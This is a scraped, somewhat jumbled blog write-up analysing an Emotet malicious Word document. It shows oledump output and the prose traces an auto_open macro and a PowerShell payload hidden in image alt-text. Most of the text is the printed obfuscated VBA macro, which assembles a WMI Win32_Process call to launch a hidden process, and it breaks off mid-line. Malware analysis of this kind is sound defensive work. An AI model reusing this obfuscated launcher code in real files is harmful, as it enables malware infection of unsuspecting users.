![\"\"](\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2020\/09\/email.png\")
<\/a><\/p>\nThe maldoc can be found here<\/a>.<\/p>\n Analysis Since OleTools and OfficeMalScanner didn’t work, I then used the other failsafe which is Didier Stevens’ Oledump script. Using this I was able to see what appeared to be 2 macros in the Word doc as seen below (denoted by the ‘M’).<\/p>\n I started with the first stream that was found (-s 12) to see what was there. Bingo. We have obfuscated code.<\/p>\n And within the other stream (-s 13) I saw how the macro kicks off – when the Word doc is opened and the macro is run (auto_open).<\/p>\n Looking at this line, it looks like it is building an array of values to execute the macro. The interesting thing is that none of the values are found in the script (that I could tell) with the exception of “Uoepmfd2vqk2.Cbzdhgt82a6foxc53q” which points to the main function of the script. If I had to hazard a guess, I would say that the other values are just garbage values to help obfuscate the code.<\/p>\n After a while of looking at the script and seeing what lines were valid and which were garbage, there was one thing that stood out to me – the lines to keep were all right before the statement of “Set nnnnnnnnn = Languages.” Once I noticed that, it made cleaning up the script much easier. The following is the script cleaned up.<\/p>\n With the script shortened, it was pretty straight forward walking through it and tracing when a function got called and what parameters were passed with it. I had not seen the CleanString method to remove any non-printable spaces before the Join function before. I also was able to use the trick of opening the Word doc up (but not enabling the macro) and pressing ALT-F11 to open the VB for Applications window to see what all was there. I did notice that there was a form there with different values assigned to the “Text” property of the object.<\/p>\n The interesting bit for me about this script, and the main impetus for this write up, was based around this line:<\/p>\n Looking up what “Content.Application.ActiveDocument.InlineShapes(1@).AlternativeText” pointed me to docs and tips about how to add an alternative text to a shape, or object in an Office doc either in the GUI or via code in VB. Seeing that there was only 1 image in the Word doc, I opened the properties of the image and looked at the alt-text tab there and got the following:<\/p>\n The following is the string of characters found in the alt-text:<\/p>\n Hrmm. Interesting to say the least considering that there is a method to remove (or split) the characters of “g,bq” after cleaning up all non-printable characters. Once I got rid of those characters, I was left with the following string:<\/p>\n Now I see what is going on – we have a long base64 encoded string for Powershell. The thing that I found odd was that it ended at the character ‘9.’ Decoding that string gave me the following code:<\/p>\n Clearly there had to be more to this than that. Unfortunately I was not able to find anything else. I ended up running the sample on my Windows VM and could see that the base64 string was longer than what I had here so I knew that I was missing something. It was then that I had remembered using Didier’s ‘strings.py’ script. I love using this script since I can use the flag of ‘-L’ and have the output sorted from shortest string to the longest string. When I went back and looked at the output it was here that I noticed where the rest of the base64 script was. The following was split into 2 sections (basically duplicated) when looking at it in strings.py:<\/p>\n I am assuming there is some sort of character limit when looking at it in the GUI versus code. The bit that I had grabbed is only a forth of all the characters from what I could tell. Taking the above base64 string and decoding it I got the following (beautified for readability):<\/p>\n The following is my attempt to deobfuscate the script function by function as I walked my way through it. The only part that is not in there is the expanded base64 found above. The part not indented is the original and the one that is indented is the de-obfuscated code with the values dropped in for completeness. <\/p>\n Artifacts IOCs OSINT File hashes Machinea ******************************************************************************** ******************************************************************************** ******************************************************************************** ******************************************************************************** ******************************************************************************** ******************************************************************************** ******************************************************************************** ******************************************************************************** Munin 1 \/ 1 > Malicious Summary ========= In this post I am going to cover how I managed to to deobfuscate the macro for this Emotet (Epoch 2) sample. The maldoc can be found here. Analysis ========== With this, I started off with the tried and true OleTools suite to see if I could get anything from this sample. Unfortunately I got a lot of Python errors when trying to run this. I then tried to run it through OfficeMalscanner and got nothing back as well. Looking at the Word doc via “file” I could see that there was a macro in the file and…<\/p>\n
\n==========
\nWith this, I started off with the tried and true OleTools suite to see if I could get anything from this sample. Unfortunately I got a lot of Python errors when trying to run this. I then tried to run it through OfficeMalscanner and got nothing back as well. Looking at the Word doc via “file” I could see that there was a macro in the file and it wasn’t something a rich-text file or something like that.<\/p>\n\r\nherbie$ file LRE-090120\\ JYW-092120.doc \r\nLRE-090120 JYW-092120.doc: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Title: Molestias., Author: Clara Leroux, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time\/Date: Mon Sep 21 16:38:00 2020, Last Saved Time\/Date: Mon Sep 21 16:38:00 2020, Number of Pages: 2, Number of Words: 5, Number of Characters: 32, Security: 0\r\n<\/pre>\n
\r\nherbie$ .\/oledump.py LRE-090120\\ JYW-092120.doc \r\n1: 114 '\\x01CompObj'\r\n2: 352 '\\x05DocumentSummaryInformation'\r\n3: 424 '\\x05SummaryInformation'\r\n4: 7035 '1Table'\r\n5: 125813 'Data'\r\n6: 514 'Macros\/PROJECT'\r\n7: 92 'Macros\/PROJECTwm'\r\n8: 97 'Macros\/Uoepmfd2vqk2\/\\x01CompObj'\r\n9: 296 'Macros\/Uoepmfd2vqk2\/\\x03VBFrame'\r\n10: 438 'Macros\/Uoepmfd2vqk2\/f'\r\n11: 504 'Macros\/Uoepmfd2vqk2\/o'\r\n12: M 27502 'Macros\/VBA\/Uoepmfd2vqk2'\r\n13: M 1679 'Macros\/VBA\/V216c23yqw7e5o2v'\r\n14: 15352 'Macros\/VBA\/_VBA_PROJECT'\r\n15: 1540 'Macros\/VBA\/__SRP_0'\r\n16: 106 'Macros\/VBA\/__SRP_1'\r\n17: 304 'Macros\/VBA\/__SRP_2'\r\n18: 103 'Macros\/VBA\/__SRP_3'\r\n19: 860 'Macros\/VBA\/dir'\r\n20: 4096 'WordDocument'\r\n<\/pre>\n
\r\nherbie$ .\/oledump.py -v -s 12 LRE-090120\\ JYW-092120.doc \r\nAttribute VB_Name = "Uoepmfd2vqk2"\r\nAttribute VB_Base = "0{5BB1BF4C-1019-4625-9105-80272C0DD792}{28F2CF55-40FF-4E43-8677-C56C8C692899}"\r\nAttribute VB_GlobalNameSpace = False\r\nAttribute VB_Creatable = False\r\nAttribute VB_PredeclaredId = True\r\nAttribute VB_Exposed = False\r\nAttribute VB_TemplateDerived = False\r\nAttribute VB_Customizable = False\r\nFunction Cbzdhgt82a6foxc53q()\r\nOn Error Resume Next\r\nSet nnnnnnnnn = Languages\r\nBcfWWjIUB = Mid _\r\n(S_k9lapvm1p, 196, 1)\r\ndYvJsnjw = Mid _\r\n(Z__ibn17mkfjsiol5, 212, 1)\r\nBiHOVG = Mid _\r\n(Qsj_pi2ufi2852dgfe, 35, 1)\r\nGQJzwq = Mid _\r\n(Dru0bzo5apcxe2pc9, 34, 1)\r\nWKcaSvfi = Mid _\r\n(Zv3rshseproglck, 9, 1)\r\nlsFUF = Mid _\r\n(Srdtikao2ecvxgp, 240, 1)\r\nVAwYHAcv = Mid _\r\n(Eyfuay0mr8k9q6da, 20, 1)\r\nhNfbEKURZVE = Mid _\r\n(Pb0_ok1un1of8, 179, 1)\r\nwYVOV = Mid _\r\n(Gb1_y82tas2cma, 190, 1)\r\nmLdZb = Mid _\r\n(Z8abjber13o, 265, 1)\r\nzOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb\r\nUNfjikDjKTc = Mid _\r\n(Zx0vguob716qdw, 33, 1)\r\nzmlHaKIVkFA = Mid _\r\n(Aqil91rp5ne, 168, 1)\r\nUCPVYn = Mid _\r\n(Levahjr27c9ut9_h, 10, 1)\r\nEIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn\r\nSFwwBAcXs = Mid _\r\n(Bu9x_darrq2t, 44, 1)\r\nscjHiSYQBQp = EIjom + SFwwBAcXs\r\nQuuseim6entz = 90\r\nSet nnnnnnnnn = Languages\r\nBcfWWjIUB = Mid _\r\n(Lakcnp87s71f7n9y, 196, 1)\r\ndYvJsnjw = Mid _\r\n(A5ggaxmwnp7jz7c, 212, 1)\r\nBiHOVG = Mid _\r\n(Co19uulv2shhotan, 35, 1)\r\nGQJzwq = Mid _\r\n(Fezxrpn9ra_, 34, 1)\r\nWKcaSvfi = Mid _\r\n(Q4_yp40i1ar, 9, 1)\r\nlsFUF = Mid _\r\n(Ppsqfi6oser3odx, 240, 1)\r\nVAwYHAcv = Mid _\r\n(Iadulufzhu01cfphyg, 20, 1)\r\nhNfbEKURZVE = Mid _\r\n(B893ifwurmi, 179, 1)\r\nwYVOV = Mid _\r\n(Ig_7z98hck4iw, 190, 1)\r\nmLdZb = Mid _\r\n(Dlm1jdicvcpi6, 265, 1)\r\nzOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb\r\nUNfjikDjKTc = Mid _\r\n(Sayn_kxudj1k20, 33, 1)\r\nzmlHaKIVkFA = Mid _\r\n(Tezg_bkh3cebjv9rrc, 168, 1)\r\nUCPVYn = Mid _\r\n(Nbxqjlxuida0njd, 10, 1)\r\nEIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn\r\nSFwwBAcXs = Mid _\r\n(Y1b7np47k6in_f4ji, 44, 1)\r\nscjHiSYQBQp = EIjom + SFwwBAcXs\r\nAy7pmbj8ld_rk9 = Vc0veos27yszc + Chr$(Quuseim6entz + (25))\r\nSet nnnnnnnnn = Languages\r\nBcfWWjIUB = Mid _\r\n(Abmzntc3d7_5amw0a, 196, 1)\r\ndYvJsnjw = Mid _\r\n(Ssiyk2ux0lw, 212, 1)\r\nBiHOVG = Mid _\r\n(J8k82drrm2h, 35, 1)\r\nGQJzwq = Mid _\r\n(L_n7e5rsggqtwn, 34, 1)\r\nWKcaSvfi = Mid _\r\n(Pe2u3fatdtdwtsuz0, 9, 1)\r\nlsFUF = Mid _\r\n(Uhknysf5e7gq2, 240, 1)\r\nVAwYHAcv = Mid _\r\n(Jm6mwhqjprkma, 20, 1)\r\nhNfbEKURZVE = Mid _\r\n(Y_xrrj5friri, 179, 1)\r\nwYVOV = Mid _\r\n(Ybfmy44jhyhd35, 190, 1)\r\nmLdZb = Mid _\r\n(U5cls96fiz0rri6, 265, 1)\r\nzOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb\r\nUNfjikDjKTc = Mid _\r\n(Wn3tikexth03mqo, 33, 1)\r\nzmlHaKIVkFA = Mid _\r\n(Llmyff2sc78x1mma, 168, 1)\r\nUCPVYn = Mid _\r\n(Al2_kktzq3k0d, 10, 1)\r\nEIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn\r\nSFwwBAcXs = Mid _\r\n(Uliag7hq1xkqnnr9h, 44, 1)\r\nscjHiSYQBQp = EIjom + SFwwBAcXs\r\nIhietwpuyrj0nq6 = "g, bq,g, bq,wg, bq,ig, bq,nmg, bq,g, bq,gmg, bq,tg, bq,g, bq," + Ay7pmbj8ld_rk9 + "g, bq,g, bq,:g, bq,wg, bq,ing, bq,g, bq,3g, bq,2g, bq,_g, bq," + Uoepmfd2vqk2.Wjhx20hqda94eekj + "g, bq,rog, bq,g, bq,ceg, bq,sg, bq,sg, bq,"\r\nSet nnnnnnnnn = Languages\r\nBcfWWjIUB = Mid _\r\n(R4j1tt_lcy2h4atkuq, 196, 1)\r\ndYvJsnjw = Mid _\r\n(Ypad86i99ny8cbz2, 212, 1)\r\nBiHOVG = Mid _\r\n(K4eftvdnstug, 35, 1)\r\nGQJzwq = Mid _\r\n(E15ttry1n7lw, 34, 1)\r\nWKcaSvfi = Mid _\r\n(Yp3yfejl73l, 9, 1)\r\nlsFUF = Mid _\r\n(K691ply3zg9cush, 240, 1)\r\nVAwYHAcv = Mid _\r\n(Nc85trxzv5o, 20, 1)\r\nhNfbEKURZVE = Mid _\r\n(X9l9safw2_9vx6, 179, 1)\r\nwYVOV = Mid _\r\n(Tr1ex8g457s_8, 190, 1)\r\nmLdZb = Mid _\r\n(Gev8i726avun, 265, 1)\r\nzOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb\r\nUNfjikDjKTc = Mid _\r\n(Jselgze7h712u1f, 33, 1)\r\nzmlHaKIVkFA = Mid _\r\n(Baaior7nzp_w8r, 168, 1)\r\nUCPVYn = Mid _\r\n(Pkl5kzull4mb, 10, 1)\r\nEIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn\r\nSFwwBAcXs = Mid _\r\n(Wfzfwn9uteh7, 44, 1)\r\nscjHiSYQBQp = EIjom + SFwwBAcXs\r\nWuueqzhfpms6gh3_p = Zk46e7c8d40(Ihietwpuyrj0nq6)\r\nSet nnnnnnnnn = Languages\r\nBcfWWjIUB = Mid _\r\n(Lakeb7tqigcm, 196, 1)\r\ndYvJsnjw = Mid _\r\n(Xh7xheg1ff26, 212, 1)\r\nBiHOVG = Mid _\r\n(Oi_e2jr0uxx3s, 35, 1)\r\nGQJzwq = Mid _\r\n(T8clzmkouz4xzsqk, 34, 1)\r\nWKcaSvfi = Mid _\r\n(Ok2mkreq47hnui6zo, 9, 1)\r\nlsFUF = Mid _\r\n(Uc6ctagykldv0s, 240, 1)\r\nVAwYHAcv = Mid _\r\n(Ucs3orq067qda, 20, 1)\r\nhNfbEKURZVE = Mid _\r\n(L90ldxhas21, 179, 1)\r\nwYVOV = Mid _\r\n(Qg4mi8zd4fn9, 190, 1)\r\nmLdZb = Mid _\r\n(Yne_gc9fy6ofj77b3v, 265, 1)\r\nzOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb\r\nUNfjikDjKTc = Mid _\r\n(Bi6jftxuo9ikvamek, 33, 1)\r\nzmlHaKIVkFA = Mid _\r\n(Alz3a0loh0b, 168, 1)\r\nUCPVYn = Mid _\r\n(Bbvw72ed0rutuiqu5, 10, 1)\r\nEIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn\r\nSFwwBAcXs = Mid _\r\n(Y2v01jcji792, 44, 1)\r\nscjHiSYQBQp = EIjom + SFwwBAcXs\r\nSet Cfsnuq6d3vy5e = CreateObject(Wuueqzhfpms6gh3_p)\r\nSet nnnnnnnnn = Languages\r\nBcfWWjIUB = Mid _\r\n(Qim37oqtd3b8p, 196, 1)\r\ndYvJsnjw = Mid _\r\n(Ejqk82c1t5jf5wvd8, 212, 1)\r\nBiHOVG = Mid _\r\n(B7k3xvnrori_n92x23, 35, 1)\r\nGQJzwq = Mid _\r\n(Bkpg8zss2u59_7c6uv, 34, 1)\r\nWKcaSvfi = Mid _\r\n(Q79pmwruqmog64, 9, 1)\r\nlsFUF = Mid _\r\n(Vzx1ncecw8ut, 240, 1)\r\nVAwYHAcv = Mid _\r\n(Clcgbnfce7cvq, 20, 1)\r\nhNfbEKURZVE = Mid _\r\n(Bfmn0e6ani6i, 179, 1)\r\nwYVOV = Mid _\r\n(M5ls4ciqfkifs, 190, 1)\r\nmLdZb = Mid _\r\n(B15ue89c8jtwood9, 265, 1)\r\nzOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb\r\nUNfjikDjKTc = Mid _\r\n(J4byj4nktiz87eirs, 33, 1)\r\nzmlHaKIVkFA = Mid _\r\n(Iuz1lop8c0gy5nhr7, 168, 1)\r\nUCPVYn = Mid _\r\n(L_48rjwzjfbel, 10, 1)\r\nEIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn\r\nSFwwBAcXs = Mid _\r\n(Xw3oexsyjn2o, 44, 1)\r\nscjHiSYQBQp = EIjom + SFwwBAcXs\r\nOxxxpk19hkgi4c7c0z = Zdlifyn2pwzi0u2e4i + Wuueqzhfpms6gh3_p + Ay7pmbj8ld_rk9 + Uoepmfd2vqk2.W8w3wpmit80chp7lx + Uoepmfd2vqk2.Dd8cp5opvyber\r\nSet nnnnnnnnn = Languages\r\nBcfWWjIUB = Mid _\r\n(Beh18bbci4uibjmm, 196, 1)\r\ndYvJsnjw = Mid _\r\n(Vidj9mvisxz0, 212, 1)\r\nBiHOVG = Mid _\r\n(T0nlexcitv5n7, 35, 1)\r\nGQJzwq = Mid _\r\n(Bekqhtlgj1sd3xr, 34, 1)\r\nWKcaSvfi = Mid _\r\n(Kmd0bw61e1k_ky, 9, 1)\r\nlsFUF = Mid _\r\n(Xc1teihsq0u1y, 240, 1)\r\nVAwYHAcv = Mid _\r\n(A6q3egsj8uqjulsim, 20, 1)\r\nhNfbEKURZVE = Mid _\r\n(Pqwbcdmgh6xas8g7d6, 179, 1)\r\nwYVOV = Mid _\r\n(Fgr3xgfd6y7aiwzdi, 190, 1)\r\nmLdZb = Mid _\r\n(Z4mp0_yx7ctc, 265, 1)\r\nzOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb\r\nUNfjikDjKTc = Mid _\r\n(Fxoezfz_78assl5p, 33, 1)\r\nzmlHaKIVkFA = Mid _\r\n(V40yebt4ire_kd, 168, 1)\r\nUCPVYn = Mid _\r\n(U_yn5r_0uie8l9q, 10, 1)\r\nEIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn\r\nSFwwBAcXs = Mid _\r\n(Virj2eadw7mryvav, 44, 1)\r\nscjHiSYQBQp = EIjom + SFwwBAcXs\r\nSet Tn1cdl9lltyho4skel = Ngdcwyg32b4skvo5c1(Oxxxpk19hkgi4c7c0z + Uoepmfd2vqk2.Wjhx20hqda94eekj)\r\nSet nnnnnnnnn = Languages\r\nBcfWWjIUB = Mid _\r\n(T_zbtc1w4mtq, 196, 1)\r\ndYvJsnjw = Mid _\r\n(Mcnx530dlo80, 212, 1)\r\nBiHOVG = Mid _\r\n(Mlly4qz_3dfgo0, 35, 1)\r\nGQJzwq = Mid _\r\n(A1eojnxok57cmfrw, 34, 1)\r\nWKcaSvfi = Mid _\r\n(Bfvplftc2i10iqp5l, 9, 1)\r\nlsFUF = Mid _\r\n(Pksza68a59o, 240, 1)\r\nVAwYHAcv = Mid _\r\n(Wksnejoi1vvmt, 20, 1)\r\nhNfbEKURZVE = Mid _\r\n(Xqcnqjac7mko, 179, 1)\r\nwYVOV = Mid _\r\n(Stllwynnpr6, 190, 1)\r\nmLdZb = Mid _\r\n(Epdnazgg79q9q, 265, 1)\r\nzOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb\r\nUNfjikDjKTc = Mid _\r\n(Dn3pgd2fy1pk_y, 33, 1)\r\nzmlHaKIVkFA = Mid _\r\n(Us0ibk5817xd, 168, 1)\r\nUCPVYn = Mid _\r\n(G3cn6et_v_l2, 10, 1)\r\nEIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn\r\nSFwwBAcXs = Mid _\r\n(A3o021tadpr1phl, 44, 1)\r\nscjHiSYQBQp = EIjom + SFwwBAcXs\r\nCfsnuq6d3vy5e.Create Qfyk87zgdp86ufle, P3_qwk943i1k8ql6, Tn1cdl9lltyho4skel\r\nSet nnnnnnnnn = Languages\r\nBcfWWjIUB = Mid _\r\n(Yj0lpxol1uc, 196, 1)\r\ndYvJsnjw = Mid _\r\n(A97xzc8zmeh36, 212, 1)\r\nBiHOVG = Mid _\r\n(Agnkq3qp0_vhben3o, 35, 1)\r\nGQJzwq = Mid _\r\n(Rul9thh69tz5b, 34, 1)\r\nWKcaSvfi = Mid _\r\n(Mvwh9qdl9v_8, 9, 1)\r\nlsFUF = Mid _\r\n(Ma3lu27dltd, 240, 1)\r\nVAwYHAcv = Mid _\r\n(Ecv682f9o1qtg59i, 20, 1)\r\nhNfbEKURZVE = Mid _\r\n(P10wf16fhedgd, 179, 1)\r\nwYVOV = Mid _\r\n(Btu3otra66_y, 190, 1)\r\nmLdZb = Mid _\r\n(Ojf14y1z5ebbn1zzw, 265, 1)\r\nzOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb\r\nUNfjikDjKTc = Mid _\r\n(Tluo_wcuz7v, 33, 1)\r\nzmlHaKIVkFA = Mid _\r\n(Dxr9k7bpltnrjos1b, 168, 1)\r\nUCPVYn = Mid _\r\n(Ulj4imigjtxi05d0a, 10, 1)\r\nEIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn\r\nSFwwBAcXs = Mid _\r\n(Opp4yh2i0cfwem, 44, 1)\r\nscjHiSYQBQp = EIjom + SFwwBAcXs\r\nEnd Function\r\nFunction Ngdcwyg32b4skvo5c1(Wu67qms7o3ov3f_u2)\r\nOn Error Resume Next\r\nSet nnnnnnnnn = Languages\r\nBcfWWjIUB = Mid _\r\n(E8sewtjp2ud, 196, 1)\r\ndYvJsnjw = Mid _\r\n(Croq4u8zd29c4txpk_, 212, 1)\r\nBiHOVG = Mid _\r\n(Eooe3vwi6pvzeh, 35, 1)\r\nGQJzwq = Mid _\r\n(B0jjxd0u0p_p, 34, 1)\r\nWKcaSvfi = Mid _\r\n(B76f3c0wzmx6h, 9, 1)\r\nlsFUF = Mid _\r\n(Bjsc47xrzgbno, 240, 1)\r\nVAwYHAcv = Mid _\r\n(Vqz3gkf0vp8c, 20, 1)\r\nhNfbEKURZVE = Mid _\r\n(Pnwwop38lqngu, 179, 1)\r\nwYVOV = Mid _\r\n(Phydpz23jx6z9hdz, 190, 1)\r\nmLdZb = Mid _\r\n(E2xbdduy9xk, 265, 1)\r\nzOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb\r\nUNfjikDjKTc = Mid _\r\n(Amwwvt38msns5d0, 33, 1)\r\nzmlHaKIVkFA = Mid _\r\n(Ssu5wmhp9ysedqrcr, 168, 1)\r\nUCPVYn = Mid _\r\n(Gkjdmyl32xoe, 10, 1)\r\nEIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn\r\nSFwwBAcXs = Mid _\r\n(Ze40pcq8yfgz, 44, 1)\r\nscjHiSYQBQp = EIjom + SFwwBAcXs\r\nSet Ngdcwyg32b4skvo5c1 = GetObject(Wu67qms7o3ov3f_u2)\r\nSet nnnnnnnnn = Languages\r\nBcfWWjIUB = Mid _\r\n(Ntysp0l_ijtph1k77, 196, 1)\r\ndYvJsnjw = Mid _\r\n(Y_z2nu_f36djtt0t, 212, 1)\r\nBiHOVG = Mid _\r\n(C_rqx3dp787eu7bhly, 35, 1)\r\nGQJzwq = Mid _\r\n(E2fesjhq8_1_, 34, 1)\r\nWKcaSvfi = Mid _\r\n(R4g8okkhwmsxea, 9, 1)\r\nlsFUF = Mid _\r\n(Zbci74ng960h, 240, 1)\r\nVAwYHAcv = Mid _\r\n(Ihqf9oq3zf4bn9, 20, 1)\r\nhNfbEKURZVE = Mid _\r\n(Kyroi0q69seylwj, 179, 1)\r\nwYVOV = Mid _\r\n(Ld57o7m11vq, 190, 1)\r\nmLdZb = Mid _\r\n(Xjgs643kov0r7, 265, 1)\r\nzOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb\r\nUNfjikDjKTc = Mid _\r\n(Ny42efqen0ucg, 33, 1)\r\nzmlHaKIVkFA = Mid _\r\n(I3yysf0ylx4t60x, 168, 1)\r\nUCPVYn = Mid _\r\n(Dnabnz8_ql637i04w, 10, 1)\r\nEIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn\r\nSFwwBAcXs = Mid _\r\n(Yx9k01n6mg9w, 44, 1)\r\nscjHiSYQBQp = EIjom + SFwwBAcXs\r\nNgdcwyg32b4skvo5c1. _\r\nshowwindow = wdKeyEquals - wdKeyEquals\r\nSet nnnnnnnnn = Languages\r\nBcfWWjIUB = Mid _\r\n(N8z1qrw043qy, 196, 1)\r\ndYvJsnjw = Mid _\r\n(Cwoi88pz8kpt1, 212, 1)\r\nBiHOVG = Mid _\r\n(Q5x7sqeifek9, 35, 1)\r\nGQJzwq = Mid _\r\n(Tq00bpbyyxtsjyuwx, 34, 1)\r\nWKcaSvfi = Mid _\r\n(E1i0fg80if8rk, 9, 1)\r\nlsFUF = Mid _\r\n(Zcyi9moezv_gdoi3vw, 240, 1)\r\nVAwYHAcv = Mid _\r\n(Wdhw4l4cdh73hnw, 20, 1)\r\nhNfbEKURZVE = Mid _\r\n(E_mzk8cby0_ds1q, 179, 1)\r\nwYVOV = Mid _\r\n(H0p53r79fkk9444, 190, 1)\r\nmLdZb = Mid _\r\n(M7b4i9i0bg06l1un2, 265, 1)\r\nzOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb\r\nUNfjikDjKTc = Mid _\r\n(Mi9321douawfj, 33, 1)\r\nzmlHaKIVkFA = Mid _\r\n(Dgvxyxmn2r4wtbwp1, 168, 1)\r\nUCPVYn = Mid _\r\n(Eslv62elz6ohn88dzf, 10, 1)\r\nEIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn\r\nSFwwBAcXs = Mid _\r\n(Yze0fsr0ehc, 44, 1)\r\nscjHiSYQBQp = EIjom + SFwwBAcXs\r\nEnd Function\r\nFunction Zk46e7c8d40(G7b_e54iwh7id_)\r\nOn Error Resume Next\r\nSet nnnnnnnnn = Languages\r\nBcfWWjIUB = Mid _\r\n(L31m5rr9jos, 196, 1)\r\ndYvJsnjw = Mid _\r\n(Csilqzwq_u8iwbn76b, 212, 1)\r\nBiHOVG = Mid _\r\n(Ca1um8zqqh_8ew8g9e, 35, 1)\r\nGQJzwq = Mid _\r\n(Arn9d87r24ewchpo8o, 34, 1)\r\nWKcaSvfi = Mid _\r\n(Xo3jfi_x3xz6q2_as2, 9, 1)\r\nlsFUF = Mid _\r\n(Qyqp9ymw8z1, 240, 1)\r\nVAwYHAcv = Mid _\r\n(Z4aisjih1dje, 20, 1)\r\nhNfbEKURZVE = Mid _\r\n(B9y6dg9x63jq05v5x, 179, 1)\r\nwYVOV = Mid _\r\n(Ycozcptr3ju, 190, 1)\r\nmLdZb = Mid _\r\n(Npmu82y25t3vf, 265, 1)\r\nzOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb\r\nUNfjikDjKTc = Mid _\r\n(T4tpyodalbr, 33, 1)\r\nzmlHaKIVkFA = Mid _\r\n(Wimxpydsi6do9, 168, 1)\r\nUCPVYn = Mid _\r\n(E7jpk5ucz19mwgktd, 10, 1)\r\nEIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn\r\nSFwwBAcXs = Mid _\r\n(Ct7pphedsy371, 44, 1)\r\nscjHiSYQBQp = EIjom + SFwwBAcXs\r\nX8e38jclqayh83g3a6 = CleanString(G7b_e54iwh7id_)\r\nSet nnnnnnnnn = Languages\r\nBcfWWjIUB = Mid _\r\n(C6r3ywvl9t2w7hk_g, 196, 1)\r\ndYvJsnjw = Mid _\r\n(Pj5z77yujf3qizd038, 212, 1)\r\nBiHOVG = Mid _\r\n(Hdv0f3uegx62vk, 35, 1)\r\nGQJzwq = Mid _\r\n(Nxap_wddnpu, 34, 1)\r\nWKcaSvfi = Mid _\r\n(Hbt8qos76_ly8l, 9, 1)\r\nlsFUF = Mid _\r\n(M9opggegr0m96g_i, 240, 1)\r\nVAwYHAcv = Mid _\r\n(Pkjdy2pncojtlms, 20, 1)\r\nhNfbEKURZVE = Mid _\r\n(Wwg0anlg7c9dqxz6, 179, 1)\r\nwYVOV = Mid _\r\n(Ucwbx6g0bd37xfw6i, 190, 1)\r\nmLdZb = Mid _\r\n(P5jsj0civ4m8qzo3tk, 265, 1)\r\nzOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb\r\nUNfjikDjKTc = Mid _\r\n(Qi3_a0juli8miixebs, 33, 1)\r\nzmlHaKIVkFA = Mid _\r\n(Uy0pjowfydr7x, 168, 1)\r\nUCPVYn = Mid _\r\n(Yv355jtap3_zr, 10, 1)\r\nEIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn\r\nSFwwBAcXs = Mid _\r\n(R4vmjirjz4s, 44, 1)\r\nscjHiSYQBQp = EIjom + SFwwBAcXs\r\nHy1d43_mrbnkby5l = Split(X8e38jclqayh83g3a6, "g, bq,")\r\nSet nnnnnnnnn = Languages\r\nBcfWWjIUB = Mid _\r\n(Wm10z37ev280anbn, 196, 1)\r\ndYvJsnjw = Mid _\r\n(H6gq1q0gau0gz, 212, 1)\r\nBiHOVG = Mid _\r\n(Qot_o1_i5snhka, 35, 1)\r\nGQJzwq = Mid _\r\n(Cypl2hs2jg723, 34, 1)\r\nWKcaSvfi = Mid _\r\n(F908lkvsoyykbazc, 9, 1)\r\nlsFUF = Mid _\r\n(E0688t69iexj5s, 240, 1)\r\nVAwYHAcv = Mid _\r\n(Fuwuol013wj3xrgrcg, 20, 1)\r\nhNfbEKURZVE = Mid _\r\n(S493lpd0df9ivf1c, 179, 1)\r\nwYVOV = Mid _\r\n(Kfzghicky3ircy, 190, 1)\r\nmLdZb = Mid _\r\n(Cf4fk4lfkn6v5oz, 265, 1)\r\nzOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + 